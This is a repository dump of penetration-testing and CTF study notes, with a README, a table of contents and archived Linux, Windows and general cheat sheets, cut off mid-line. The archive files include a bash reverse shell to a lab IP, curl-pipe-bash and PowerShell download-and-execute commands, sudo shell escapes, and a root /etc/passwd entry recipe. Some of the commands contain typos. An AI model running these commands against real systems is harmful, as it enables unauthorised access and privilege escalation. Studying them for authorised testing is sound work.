├── .gitbook └── assets │ └── 0_roztlgbulghhs2p_.png ├── CONTRIBUTING.md ├── Fundamentals ├── Computing │ └── README.md └── Networking │ └── README.md ├── README.md ├── SUMMARY.md ├── archive ├── linux.md ├── notes.md ├── os_agnostic.md └── windows.md ├── basic-enumeration.md ├── hackers-rest.md ├── hacking-methodology.md ├── hands-on-practice.md ├── linux-1 ├── hardening-and-setup.md ├── hardening-and-setup │ ├── README.md │ └── tmux-screen-cheatsheet.md ├── linux-hardening │ ├── README.md │ └── tmux-screen-cheatsheet.md ├── linux-redteam │ ├── README.md │ ├── enumeration.md │ ├── exfiltration.md │ ├── getting-access.md │ ├── persistance.md │ ├── pivoting-lateral-movement.md │ └── privilege-escalation.md ├── linux.md ├── linux │ ├── README.md │ ├── enumeration.md │ ├── getting-access.md │ ├── persistance.md │ └── privilege-escalation.md ├── unix-fundamentals.md └── vim.md ├── macos ├── hardening-and-configuration.md ├── macos-basics.md ├── macos-hardening.md ├── macos-redteam │ ├── README.md │ ├── enumeration.md │ ├── getting-access.md │ ├── persistence.md │ └── privilege-escalation.md └── red-team-notes │ ├── README.md │ ├── enumeration.md │ ├── getting-access.md │ ├── persistence.md │ └── privilege-escalation.md ├── mobile ├── android.md └── ios.md ├── os-agnostic ├── basic-enumeration.md ├── cryptography-and-encryption.md ├── network-hardware.md ├── os_agnostic.md ├── osint.md ├── password-cracking.md ├── password-cracking │ ├── README.md │ ├── cracking-the-hashes.md │ ├── gathering-the-hashes.md │ └── wordlist-manipulation.md ├── pivoting.md ├── pivoting │ ├── chisel.md │ ├── plink.exe.md │ ├── proxychains.md │ ├── socat.md │ ├── ssh.md │ └── sshuttle.md ├── reverse-engineering-and-binary-exploitation.md ├── reverse-engineering-and-binary-exploitation │ ├── README.md │ └── buffer-overflow.md ├── scripting.md ├── scripting │ ├── README.md │ └── script-language-comparison.md ├── sql.md ├── ssh-and-scp.md ├── steganography.md └── wifi.md ├── tools-cheatsheets ├── README.md └── cybersecurity-youtube-channels.md ├── untitled.md ├── web ├── burp-suite.md ├── dns.md └── web-notes │ ├── README.md │ ├── command-injection.md │ ├── enumeration.md │ ├── subdomain-virtual-host-enumeration.md │ ├── the-web-application-hackers-handbook.md │ └── web-filter-bypass.md └── windows-1 ├── active-directory.md ├── hardening-and-setup.md ├── powershell.md ├── windows-basics.md ├── windows-hardening.md └── windows-redteam ├── README.md ├── active-directory ├── README.md ├── enumeration.md ├── getting-access.md ├── persistence.md └── privilege-escalation.md ├── data-exfiltration.md ├── enumeration.md ├── getting-access.md ├── impacket.md ├── kerberos.md ├── persistence.md ├── pivoting-lateral-movement.md └── privilege-escalation.md /.gitbook/assets/0_roztlgbulghhs2p_.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zweilosec/Infosec-Notes/ddfbc153f5d11ab5dd5810ddd81271499935cde5/.gitbook/assets/0_roztlgbulghhs2p_.png -------------------------------------------------------------------------------- /CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | **If you would like to add to, modify, or improve anything in my notes, PLEASE DO!** 2 | 3 | If you would like to give suggestions or even commit changes to these pages feel free to head to my GitHub page at: 4 | 5 | {% embed url="https://github.com/zweilosec/Infosec-Notes" caption="" %} 6 | 7 | ### How to contribute 8 | 9 | 1. [Create an Issue Request](https://github.com/zweilosec/Infosec-Notes/issues) describing your changes/additions. 10 | 2. Fork [this repository](https://github.com/zweilosec/Infosec-Notes). 11 | 3. Push some code to your fork. 12 | 4. Come back to this repository and [open a pull request](https://github.com/zweilosec/Infosec-Notes/pulls). 13 | 5. After reviewing your changes, I will merge your pull request to the master repository. 14 | 6. Make sure to update your Issue Request so that I can credit you! Thank you so much! 15 | 16 | Feel free to also open an issue with any questions, help wanted, or requests! 17 | 18 | Throughout these notes I have put `TODO:` notes that indicate that I know a certain section needs work. Focus on these if you can! 19 | 20 | ```bash 21 | TODO: Change all code examples to use variables (e.g. $host_ip) 22 | rather than fill-in-the-blank format (e.g. ). 23 | This will help greatly with copying code directly into scripts. 24 | ``` 25 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: >- 3 | A collection of notes for Penetration Testers and Ethical Hackers. My journey 4 | to OSCP and beyond. 5 | --- 6 | 7 | # Hacker's Rest 8 | 9 | These are my publicly accessible notes from various sources for penetration testing, red-teaming, OSCP, Capture the Flag (CTF) challenges, and my [Vulnhub](https://www.vulnhub.com/)/ [Hack the Box](https://hackthebox.eu) machine [write-ups](https://zweilosec.github.io/). 10 | 11 | {% hint style="warning" %} 12 | Warning - These notes are largely unformatted right now. They are based on my way of learning things - by reading, doing, studying, exploring, and taking notes. Cleaning up and formatting comes later. 13 | 14 | * Do not assume anything from these notes. 15 | * Do not expect the notes to be exhaustive, or to cover the techniques or the output they produce in full. 16 | * Expect mistakes in the notes. 17 | * Feel free to ask questions! 18 | * Always consult additional resources. If possible I will try to link to outside resources. _If I have shared something of yours and you want credit, please let me know!_ 19 | {% endhint %} 20 | 21 | ## Contribution 22 | 23 | **If you would like to add to, modify, or improve anything in my notes, PLEASE DO!** 24 | 25 | If you would like to give suggestions or even commit changes to these pages feel free to head to my GitHub page at: 26 | 27 | {% embed url="https://github.com/zweilosec/Infosec-Notes" %} 28 | 29 | ### How to contribute 30 | 31 | 1. [Create an Issue Request](https://github.com/zweilosec/Infosec-Notes/issues) describing your changes/additions. 32 | 2. Fork [this repository](https://github.com/zweilosec/Infosec-Notes). 33 | 3. Push some code to your fork. 34 | 4. Come back to this repository and [open a pull request](https://github.com/zweilosec/Infosec-Notes/pulls). 35 | 5. After reviewing your changes, I will merge your pull request to the master repository. 36 | 6. Make sure to update your Issue Request so that I can credit you! Thank you so much! 37 | 38 | Feel free to also open an issue with any questions, help wanted, or requests! Throughout these notes I have put `TODO:` notes that indicate that I know a certain section needs work. Focus on these if you can! 39 | 40 | ```bash 41 | TODO: Change all code examples to use variables (e.g. $host_ip) 42 | rather than fill-in-the-blank format (e.g. ). 43 | This will help greatly with copying code directly into scripts. 44 | ``` 45 | 46 | ## Contents 47 | 48 | The following sub-pages of these notes will explore some of the common offensive and defensive security techniques including gaining shells, code execution, lateral movement, persistence, scripting, tools and much more. I also cover techniques for dealing with CTF-type challenges such as cryptography, reverse engineering, steganography and more. 49 | 50 | {% hint style="success" %} 51 | Hack Responsibly. 52 | 53 | Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here. 54 | {% endhint %} 55 | 56 | ### Linux 57 | 58 | * [Linux Basics](linux-1/linux-basics.md) 59 | * [Hardening & Configuration Guide ](linux-1/linux-hardening/) 60 | * [TMUX/Screen Cheatsheet](linux-1/linux-hardening/tmux-screen-cheatsheet.md) 61 | * [Red Team Notes](linux-1/linux-redteam/) 62 | * [Enumeration](linux-1/linux-redteam/enumeration.md) 63 | * [Getting Access](linux-1/linux-redteam/getting-access.md) 64 | * [Privilege Escalation](linux-1/linux-redteam/privilege-escalation.md) 65 | * [Exfiltration](linux-1/linux-redteam/exfiltration.md) 66 | * [Persistence](linux-1/linux-redteam/persistance.md) 67 | * [Vim](linux-1/vim.md) 68 | 69 | ### Windows 70 | 71 | * [Windows Basics](windows-1/windows-basics.md) 72 | * [Hardening & Configuration Guide](windows-1/windows-hardening.md) 73 | * [Red Team Notes](windows-1/windows-redteam/) 74 | * [Enumeration](windows-1/windows-redteam/enumeration.md) 75 | * [Getting Access](windows-1/windows-redteam/getting-access.md) 76 | * [Privilege Escalation](windows-1/windows-redteam/privilege-escalation.md) 77 | * [Persistence](windows-1/windows-redteam/persistence.md) 78 | * [Active Directory](windows-1/windows-redteam/active-directory/) 79 | * [PowerShell](windows-1/powershell.md) 80 | 81 | ### MacOS 82 | 83 | * [MacOS Basics](macos/macos-basics.md) 84 | * [Hardening & Configuration Guide](macos/macos-hardening.md) 85 | * [Red Team Notes](macos/macos-redteam/) 86 | * [Enumeration](macos/macos-redteam/enumeration.md) 87 | * [Getting Access](macos/macos-redteam/getting-access.md) 88 | * [Privilege Escalation](macos/macos-redteam/privilege-escalation.md) 89 | * [Persistence](macos/macos-redteam/persistence.md) 90 | 91 | ### Web 92 | 93 | * [DNS](web/dns.md) 94 | * [Subdomain/Virtual Host Enumeration](web/web-notes/subdomain-virtual-host-enumeration.md) 95 | * [Web Apps](web/web-notes/) 96 | * [Web Application Hacker's Handbook Task Checklist](web/web-notes/the-web-application-hackers-handbook.md) 97 | 98 | ### Mobile 99 | 100 | * [iOS](mobile/ios.md) 101 | * [Android](mobile/android.md) 102 | 103 | ### OS Agnostic 104 | 105 | * [Cryptography & Encryption](os-agnostic/password-cracking/) 106 | * [Network Hardware](os-agnostic/network-hardware.md) 107 | * [OS Agnostic](os-agnostic/os\_agnostic.md) 108 | * [OSINT](os-agnostic/osint.md) 109 | * [Password Cracking](os-agnostic/password-cracking/) 110 | * [Gathering the Hashes](os-agnostic/password-cracking/gathering-the-hashes.md) 111 | * [Wordlist Generation](os-agnostic/password-cracking/wordlist-manipulation.md) 112 | * [Cracking the Hashes](os-agnostic/password-cracking/cracking-the-hashes.md) 113 | * [Reverse Engineering & Binary Exploitation](os-agnostic/reverse-engineering-and-binary-exploitation/) 114 | * [Buffer Overflow](os-agnostic/reverse-engineering-and-binary-exploitation/buffer-overflow.md) 115 | * [Scripting](os-agnostic/scripting/) 116 | * [Scripting Language Syntax Comparison](os-agnostic/scripting/script-language-comparison.md) 117 | * [SQL](os-agnostic/sql.md) 118 | * [SSH & SCP](os-agnostic/ssh-and-scp.md) 119 | * [Steganography](os-agnostic/steganography.md) 120 | * [Wireless](os-agnostic/wifi.md) 121 | 122 | ### Unsorted 123 | 124 | * [Unsorted Notes](untitled.md) 125 | 126 | ## OSCP/CTF Tools and Cheatsheets 127 | 128 | See my [list of outside sources](tools-cheatsheets/)! 129 | 130 | If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)! 131 | -------------------------------------------------------------------------------- /SUMMARY.md: -------------------------------------------------------------------------------- 1 | # Table of contents 2 | 3 | * [Hacker's Rest](README.md) 4 | * [Tools & Cheatsheets](tools-cheatsheets/README.md) 5 | * [Cybersecurity YouTube Channels](tools-cheatsheets/cybersecurity-youtube-channels.md) 6 | * [Hacking Methodology](hacking-methodology.md) 7 | * [Hands-on Practice](hands-on-practice.md) 8 | 9 | ## Fundamentals 10 | * [Network Fundamentals](Fundamentals/Networking/README.md) 11 | * [Computer Fundamentals](Fundamentals/Computing/README.md) 12 | 13 | ## Unix 14 | 15 | * [Unix Fundamentals](linux-1/unix-fundamentals.md) 16 | * [Hardening & Setup](linux-1/linux-hardening/README.md) 17 | * [TMUX/Screen Cheatsheet](linux-1/linux-hardening/tmux-screen-cheatsheet.md) 18 | * [Red Team Notes](linux-1/linux-redteam/README.md) 19 | * [Enumeration](linux-1/linux-redteam/enumeration.md) 20 | * [Getting Access](linux-1/linux-redteam/getting-access.md) 21 | * [Privilege Escalation](linux-1/linux-redteam/privilege-escalation.md) 22 | * [Pivoting/Lateral Movement](linux-1/linux-redteam/pivoting-lateral-movement.md) 23 | * [Data Exfiltration](linux-1/linux-redteam/exfiltration.md) 24 | * [Persistence](linux-1/linux-redteam/persistance.md) 25 | * [Vim](linux-1/vim.md) 26 | 27 | ## Windows 28 | 29 | * [Windows Fundamentals](windows-1/windows-basics.md) 30 | * [PowerShell](windows-1/powershell.md) 31 | * [Hardening & Setup](windows-1/windows-hardening.md) 32 | * [Red Team Notes](windows-1/windows-redteam/README.md) 33 | * [Enumeration](windows-1/windows-redteam/enumeration.md) 34 | * [Getting Access](windows-1/windows-redteam/getting-access.md) 35 | * [Privilege Escalation](windows-1/windows-redteam/privilege-escalation.md) 36 | * [Pivoting/Lateral Movement](windows-1/windows-redteam/pivoting-lateral-movement.md) 37 | * [Persistence](windows-1/windows-redteam/persistence.md) 38 | * [Data Exfiltration](windows-1/windows-redteam/data-exfiltration.md) 39 | * [Active Directory](windows-1/windows-redteam/active-directory/README.md) 40 | * [Enumeration](windows-1/windows-redteam/active-directory/enumeration.md) 41 | * [Getting Access](windows-1/windows-redteam/active-directory/getting-access.md) 42 | * [Privilege Escalation](windows-1/windows-redteam/active-directory/privilege-escalation.md) 43 | * [Persistence](windows-1/windows-redteam/active-directory/persistence.md) 44 | * [Kerberos](windows-1/windows-redteam/kerberos.md) 45 | * [Impacket](windows-1/windows-redteam/impacket.md) 46 | 47 | ## MacOS 48 | 49 | * [MacOS Basics](macos/macos-basics.md) 50 | * [Hardening & Configuration](macos/macos-hardening.md) 51 | * [Red Team Notes](macos/macos-redteam/README.md) 52 | * [Enumeration](macos/macos-redteam/enumeration.md) 53 | * [Getting Access](macos/macos-redteam/getting-access.md) 54 | * [Privilege Escalation](macos/macos-redteam/privilege-escalation.md) 55 | * [Persistence](macos/macos-redteam/persistence.md) 56 | 57 | ## Web 58 | 59 | * [Burp Suite](web/burp-suite.md) 60 | * [DNS](web/dns.md) 61 | * [Web Notes](web/web-notes/README.md) 62 | * [Enumeration](web/web-notes/enumeration.md) 63 | * [Web Filter Bypass](web/web-notes/web-filter-bypass.md) 64 | * [Command Injection](web/web-notes/command-injection.md) 65 | * [Subdomain/Virtual Host Enumeration](web/web-notes/subdomain-virtual-host-enumeration.md) 66 | * [The Web Application Hacker's Handbook](web/web-notes/the-web-application-hackers-handbook.md) 67 | 68 | ## Mobile 69 | 70 | * [iOS](mobile/ios.md) 71 | * [Android](mobile/android.md) 72 | 73 | ## OS Agnostic 74 | 75 | * [Basic Enumeration](os-agnostic/basic-enumeration.md) 76 | * [Cryptography & Encryption](os-agnostic/cryptography-and-encryption.md) 77 | * [Network Hardware](os-agnostic/network-hardware.md) 78 | * [OS Agnostic](os-agnostic/os\_agnostic.md) 79 | * [OSINT](os-agnostic/osint.md) 80 | * [Password Cracking](os-agnostic/password-cracking/README.md) 81 | * [Gathering the Hashes](os-agnostic/password-cracking/gathering-the-hashes.md) 82 | * [Wordlist Manipulation](os-agnostic/password-cracking/wordlist-manipulation.md) 83 | * [Cracking the Hashes](os-agnostic/password-cracking/cracking-the-hashes.md) 84 | * [Pivoting](os-agnostic/pivoting.md) 85 | * [Chisel](os-agnostic/pivoting/chisel.md) 86 | * [Plink.exe](os-agnostic/pivoting/plink.exe.md) 87 | * [SSH](os-agnostic/pivoting/ssh.md) 88 | * [Sshuttle](os-agnostic/pivoting/sshuttle.md) 89 | * [Socat](os-agnostic/pivoting/socat.md) 90 | * [Reverse Engineering & Binary Exploitation](os-agnostic/reverse-engineering-and-binary-exploitation/README.md) 91 | * [Buffer Overflow](os-agnostic/reverse-engineering-and-binary-exploitation/buffer-overflow.md) 92 | * [Scripting](os-agnostic/scripting/README.md) 93 | * [Script Language Syntax](os-agnostic/scripting/script-language-comparison.md) 94 | * [SQL](os-agnostic/sql.md) 95 | * [SSH & SCP](os-agnostic/ssh-and-scp.md) 96 | * [Steganography](os-agnostic/steganography.md) 97 | * [Wireless](os-agnostic/wifi.md) 98 | 99 | *** 100 | 101 | * [Unsorted](untitled.md) 102 | -------------------------------------------------------------------------------- /archive/linux.md: -------------------------------------------------------------------------------- 1 | # Linux 2 | 3 | ## Linux 4 | 5 | Website for searching for shells through random programs such as 'vi' "living off the land binaries": [GTFObins](https://gtfobins.github.io/) 6 | 7 | ### Enumeration 8 | 9 | find files user has access to: 10 | 11 | ```bash 12 | find / -user -ls 2>/dev/null 13 | ``` 14 | `which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null` - Check if each of these useful programs are installed on the machine 15 | 16 | [Linux Privilege Checker](https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py) 17 | 18 | full linux enumeration: 19 | 20 | * [LinEnum.sh](https://github.com/rebootuser/LinEnum) 21 | * [LinPEAS.sh](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) 22 | 23 | download **and** execute script \(such as LinEnum.sh\) \[from remote host\]: `curl /LinEnum.sh | bash` 24 | 25 | Locate exploits: 26 | 27 | ```bash 28 | searchsploit 29 | 30 | #to pull exploit code: 31 | searchsploit -x 32 | ``` 33 | 34 | enumerate running processes: `pspy` 35 | 36 | `ps -U root -u root ux` View all processes started by a certain user (root in this case) 37 | 38 | enumeration multi-tool: [Sparta](https://sparta.secforce.com/) \(does nmap, hydra, nikto, sqlscan, ssl...\) 39 | 40 | Semi-automated enumeration all-in-one (use this!): [nmapAutomator](https://github.com/21y4d/nmapAutomator) 41 | 42 | Unix hardening tool that can be used for enumeration: [Bastille](http://bastille-linux.sourceforge.net/) 43 | 44 | enumerate info about current processes running from: `/proc/self/status` 45 | 46 | common Local File Inclusion locations: [https://github.com/tennc/fuzzdb/tree/master/dict/BURP-PayLoad/LFI](https://github.com/tennc/fuzzdb/tree/master/dict/BURP-PayLoad/LFI) 47 | 48 | ### Upgrade shells: 49 | 50 | ```text 51 | 1. python -c 'import pty; pty.spawn("/bin/sh")' 52 | 2. perl -e 'exec "/bin/sh";' 53 | 3. ruby -e 'exec "/bin/sh"' 54 | ``` 55 | To upgrade to fully interactive shell (python example): 56 | ```bash 57 | python -c 'import pty;pty.spawn("/bin/bash")'; 58 | ctrl-z #[to background] 59 | stty raw -echo; 60 | fg #[to return shell to foreground] 61 | export TERM=xterm 62 | ``` 63 | 64 | php shell: `` 65 | 66 | bash reverse shell: 67 | 68 | ```text 69 | bash -i >& /dev/tct/10.10.14.148/9001 0>&1 70 | 71 | #URL encoded: 72 | bash+-i+>%26+/dev/tcp/10.10.14.148/9001+0>%261 73 | ``` 74 | 75 | nc listener: `nc -lvnp ` 76 | 77 | ### TMUX 78 | 79 | tmux can keep alive sessions if you lose ssh sessions etc, can split panes and more: 80 | 81 | ```text 82 | tmux new -s 83 | ctrl-b = prefix key (enables addnl commands) 84 | +[%] vertical pane 85 | +["] horizontal pane 86 | +[alt-space] switch pane between horizontal or vertical 87 | +[arrow_keys] move between panes 88 | +[z] zoom in/out on pane 89 | +[?] help for tmux 90 | +[t] timer 91 | ``` 92 | 93 | tmux plugins: 94 | 95 | * tmux logging plugin \(get this!!\) can save log of tmux windows 96 | * [better mouse mode](https://github.com/NHDaly/tmux-better-mouse-mode) 97 | 98 | ### Privilege Escalation 99 | 100 | [https://payatu.com/guide-linux-privilege-escalation](https://payatu.com/guide-linux-privilege-escalation) 101 | 102 | execute `sudo` command as another user: `sudo -u [command]` 103 | 104 | list user's sudo permissions: `sudo -l` 105 | 106 | execute any command while in `less`: `!` 107 | 108 | Privilege Escalation to Root by setting suid on `/bin/less`: `chmod 47555 /bin/less` 109 | 110 | Privilege Escalation to Root with `find`: `sudo find /etc -exec sh -i \;` 111 | 112 | wildcard injection: \[NEED MORE HERE\] 113 | 114 | ```bash 115 | mawk 'BEGIN {system("/bin/sh")}' 116 | ``` 117 | 118 | If your user can `sudo` any of these text editors: 119 | ```bash 120 | 1. [user@localhost]$ sudo vi 121 | 2. :shell 122 | 3. [root@localhost]# 123 | 124 | 1. [user@localhost]$ sudo less file.txt 125 | 2. !bash 126 | 3. [root@localhost]# 127 | 128 | 1. [user@localhost]$ sudo more long_file.txt 129 | 2. !bash 130 | 3. [root@localhost]# 131 | Note: for this method to work, the attacker has to read a file that is longer than one page 132 | ``` 133 | ### Remote Code Execution 134 | 135 | https://www.cyberciti.biz/faq/linux-unix-osx-bsd-ssh-run-command-on-remote-machine-server/ 136 | Run commands on remote system without a shell through SSH with a "Herefile" 137 | ``` 138 | ssh server1 << HERE 139 | command1 140 | command2 141 | HERE 142 | ``` 143 | 144 | ### Misc Linux 145 | 146 | Raw memory location so no files on disk: `/dev/shm/` 147 | 148 | list all running commands: 149 | 150 | ```bash 151 | ps -eo command` 152 | #change delimiter to \n instead of (loop by line): 153 | IFS=$'\n' 154 | #Then loop through each line in output: 155 | for i in $(ps -eo command); do echo $i; done 156 | ``` 157 | 158 | https://unix.stackexchange.com/questions/211817/copy-the-contents-of-a-file-into-the-clipboard-without-displaying-its-contents 159 | script to copy contents of file directly to clipboard; Save in PATH location then enjoy! 160 | ``` 161 | #! /bin/bash 162 | xclip -selection clipboard -i $@ 163 | ``` 164 | 165 | 'new' netstat: `ss -lnp | grep 9001` \#check if any connections on port 9001 166 | 167 | copy files to local machine without file transfer: 168 | 169 | ```bash 170 | base64 -w 0 /path/of/file/name.file 171 | #copy base64 then: 172 | echo -n | base64 -d > filename.file 173 | ``` 174 | 175 | pretty print JSON text in console (https://www.howtogeek.com/529219/how-to-parse-json-files-on-the-linux-command-line-with-jq/). Pipe the JSON output to `jq`. Example from NASA ISS API: `curl -s http://api.open-notify.org/iss-now.json | jq` 176 | 177 | web application fuzzer: [wfuzz](https://github.com/xmendez/wfuzz) 178 | 179 | convert rpm to debian packages: `alien ` 180 | 181 | `sudo rm --force $(which )` Remove all instances of a certain file. Could be used with `find` instead of `which`. dangerous with --force!! 182 | 183 | cycle through previous arguments: `alt-.` 184 | 185 | move between "words" on a command line `ctrl-[arrow_keys]` 186 | 187 | 188 | ### PATH 189 | 190 | Add new $PATHs to `.profile` rather than `.bashrc`, then `source ~/.profile` to use new PATHs 191 | 192 | Makes `pwd` part of path so dont need `./` * NOT RECOMMENDED for home use! * `export PATH='pwd':$PATH` 193 | 194 | The bullet-proof way to add a path (e.g., ~/opt/bin) to the PATH environment variable is: 195 | (from https://unix.stackexchange.com/questions/26047/how-to-correctly-add-a-path-to-path) 196 | ``` 197 | PATH="${PATH:+${PATH}:}~/opt/bin" 198 | for appending (instead of PATH="$PATH:~/opt/bin") and 199 | 200 | PATH="~/opt/bin${PATH:+:${PATH}}" 201 | for prepending (instead of PATH="~/opt/bin:$PATH") 202 | ``` 203 | -------------------------------------------------------------------------------- /archive/os_agnostic.md: -------------------------------------------------------------------------------- 1 | # OS Agnostic 2 | 3 | ## Encryption/Decryption 4 | 5 | [CyberChef](https://gchq.github.io/CyberChef/): Website for encryption/decryption of many different types at same time 6 | 7 | good cipher tools: [http://rumkin.com/](http://rumkin.com/) 8 | 9 | one time pad: `pt - ct = key` 10 | 11 | decrypt rsa private key: `openssl rsautl -decrypt -inkey < ` 12 | 13 | * [Ippsec:HacktheBox - Charon](https://www.youtube.com/watch?v=_csbKuOlmdE) 14 | 15 | `hydra -e nsr` - additional checks, "n" for null password, "s" try login as pass, "r" try the reverse login as pass 16 | 17 | crack password with known format: 18 | 19 | ```bash 20 | hashcat -m <1600 (hashtype)> --force -a 3 -1 ?1?1?1?1?1?1?1?1 -O 21 | [?1 = use 1 char from '1' set] 22 | ``` 23 | 24 | create wordlist with known character set & length: 25 | 26 | ```bash 27 | crunch <8 (min_length)> <8 (max_length)> > wordlist.txt 28 | ``` 29 | 30 | get hash formats for [hashcat](https://hashcat.net/wiki/doku.php?id=example_hashes) 31 | 32 | [Jumbo John](https://github.com/magnumripper/JohnTheRipper) 33 | 34 | generate password for insertion into /etc/passwd: 35 | 36 | ```bash 37 | openssl passwd -l [or 1?] -salt 38 | ::0:0:root:/root:/bin/bash #enter into /etc/passwd like this 39 | ``` 40 | 41 | [Hashes.org](https://hashes.org/): large database of pre-cracked hashes 42 | 43 | Many password lists to download at [skullsecurity](https://wiki.skullsecurity.org/Passwords) 44 | 45 | ## Binary Exploitation 46 | 47 | gdb plugin for exploits/creates patterns for ROP determination: peda.py/pwndbg \[gdb: pattern create \#\#\#\] 48 | 49 | ASLR Bypass/binary exploit/gdb: 50 | 51 | * [Ippsec:HackTheBox - October](https://www.youtube.com/watch?v=K05mJazHhF4) 52 | * [Ippsec:Camp CTF - Bitterman](https://www.youtube.com/watch?v=6S4A2nhHdWg) 53 | * [pwnTools](https://github.com/Gallopsled/pwntools) - [documentation](http://docs.pwntools.com/en/stable/) 54 | * [Binary Ninja](https://binary.ninja/) 55 | 56 | [Packetstorm](https://packetstormsecurity.com/) /bin/sh shellcode 57 | 58 | simple binary exploitation [Ippsec:HacktheBox - Sneaky](https://www.youtube.com/watch?v=1UGxjqTnuyo) 59 | 60 | [protostar ctf](https://exploit-exercises.com/protostar/) for getting into binary exploitation 61 | 62 | ## HTTP 63 | 64 | in order to proxy tools that have no proxy option: create burn proxy 127.0.0.1:80 [Ippsec:HacktheBox - Granny & Grandpa](https://www.youtube.com/watch?v=ZfPVGJGkORQ) 65 | 66 | vulnerability testing for webdav \(or other file upload vulns!\): `davtest` 67 | 68 | bypassing filetype filters with http MOVE command to rename allowed filetype [Ippsec:HacktheBox - Granny & Grandpa](https://www.youtube.com/watch?v=ZfPVGJGkORQ) 69 | 70 | Wordpress enumeration: `wpscan -u [--disable-tls-checks]` 71 | 72 | pull Google cached webpage if not loading: `cache:https://` 73 | 74 | virtual host routing: substitute ip for hostname to get different results 75 | 76 | gobuster: 77 | 78 | ```bash 79 | gobuster -u -l -w -x php -t 20 80 | [-l include length, -x append .php to searches, -t threads] 81 | ``` 82 | 83 | hydra against http wordpress login walkthrough: [IppSec:HacktheBox - Apocalyst](https://www.youtube.com/watch?v=TJVghYBByIA) 84 | 85 | ## SQL 86 | 87 | blind sql injection UNIoN queries: [Ippsec:HacktheBox - Charon](https://www.youtube.com/watch?v=_csbKuOlmdE) use `CONCAT("x","x")` 88 | 89 | get shell in mysql: `\! /bin/sh` 90 | 91 | [SQL Injection Cheatsheet](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/) 92 | 93 | ## DNS 94 | 95 | DNS reverse lookup recon: `dnsrecon -r -n ` 96 | 97 | DNS zone transfer: `dig axfr @` 98 | 99 | add DNS server: `/etc/resolv.conf {nameserver }` 100 | 101 | add Hosts: `/etc/hosts` 102 | 103 | ## Steganography 104 | 105 | extract files from stego'd files: `binwalk -Me ` 106 | 107 | ## SSH 108 | 109 | generate ssh key for reomote access: 110 | 111 | ```bash 112 | ssh-keygen -f ; cat ; 113 | #copy to remote host 114 | echo > ./.ssh/authorized_keys #on remote host in /home// 115 | chmod 600 ; 116 | ssh -i 117 | ``` 118 | 119 | generate public key from private key: 120 | 121 | ```bash 122 | ssh-keygen -y -f ~/.ssh/id_rsa > ~/.ssh/id_rsa.pub 123 | 124 | #As a side note, the comment of the public key is lost,so you need to edit ~/.ssh/id_rsa.pub 125 | #append a comment to the first line with a space between the comment and key data. An example public key is shown truncated below. 126 | 127 | "ssh-rsa AAAA..../VqDjtS5 ubuntu@ubuntu" 128 | ``` 129 | 130 | If connection is dropped upon connect: 131 | 132 | * Don't use bash for this session, try dash \(or /bin/sh\): `ssh 127.0.0.1 /bin/dash` 133 | * Use bash with command options to disable processing startup files: 134 | 135 | ```bash 136 | ssh 127.0.0.1 "bash --noprofile --norc" 137 | ``` 138 | 139 | ## Unsorted 140 | 141 | shortcut for all ports: `nmap -p-` 142 | 143 | Firefox Browser plugins:Tampermonkey \(userscript manager\); Cookie Manager+; 144 | 145 | signing APK files: [IppSec:HHC2016 - Debug](https://www.youtube.com/watch?v=fcemTQaosOQ) 146 | 147 | view hex of file only: `xxd -p` 148 | 149 | reverse from hex: `xxd -r -p > ` 150 | 151 | vim: 152 | 153 | * Learn vim: `vimtutor` 154 | * [https://www.youtube.com/watch?v=OnUiHLYZgaA](https://www.youtube.com/watch?v=OnUiHLYZgaA) 155 | * vim plugins: fuzzy finder plugin ctrlp /// surround.vim 156 | 157 | msfvenom custom exploit making:\[Ippsec:HacktheBox - Granny & Grandpa\] 158 | 159 | ```bash 160 | msfvenom -p LHOST= etc... -f 161 | ``` 162 | 163 | injecting IPs when '.' is disallowed: convert dotted\_decimal to decimal value -[ip2dh](https://github.com/4ndr34z/MyScripts/blob/master/ip2dh.py) 164 | 165 | [AndroidAssetStudio](https://romannurik.github.io/AndroidAssetStudio/index.html) 166 | 167 | port knocking: [Ippsec:HackTheBox - Nineveh](https://www.youtube.com/watch?v=K9DKULxSBK4) 168 | 169 | * iptables knockd 170 | 171 | ```bash 172 | for i in ; do nmap -Pn -p $i --host_timeout 201 --max_retries 0 ; done 173 | ``` 174 | 175 | recursively download all files in hosted folder: `wget -r ` 176 | 177 | [Hurricane Electric ISP](http://he.net/): Ippsec uses with IPv6 as a psuedo-VPN in [HTB:Sneaky](https://www.youtube.com/watch?v=1UGxjqTnuyo) 178 | 179 | IPv6 primer [Ippsec:HacktheBox - Sneaky](https://www.youtube.com/watch?v=1UGxjqTnuyo) 180 | 181 | ```text 182 | fe80::/10 - febf:ffff:ffff:ffff:ffff:ffff:ffff:ffff Unique Link Local 169.254.x.x APIPA 183 | (built from MAC address on Linux, 7th bit flips, adds ff:fe in the center) 184 | 185 | fc00::/7 - fdff:ffff:ffff:ffff:ffff:ffff:ffff:ffff Unique Local Unicast 10.x.x.x, 172.16.x.x, 192.168.x.x 186 | 187 | 2000::/3 - Global Unicast routable 188 | 189 | ff02::1 - Multicast All Nodes 190 | 191 | ff02::2 Multicast ROUTER nodes 192 | ``` 193 | 194 | ip6tables - iptables for ipv6 195 | 196 | -------------------------------------------------------------------------------- /archive/windows.md: -------------------------------------------------------------------------------- 1 | # Windows 2 | 3 | living off the land binaries: [LOLBAS](https://lolbas-project.github.io/) 4 | 5 | ## Enumeration 6 | 7 | Windows Privilege Escalation Enumeration Script: [WinPEAS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS) 8 | 9 | Little bit o' everything: [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/) 10 | 11 | ## Unsorted 12 | 13 | Powershell full path: `C:\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe` 14 | 15 | Powershell "wget" and execute remote code: 16 | 17 | ```text 18 | powershell "Invoke-Expression(New-Object Net.Webclient).downloadString('http://:/')" 19 | ``` 20 | 21 | Powershell Script Execution Bypass: \[can embed in php too!\]: 22 | 23 | ```text 24 | echo 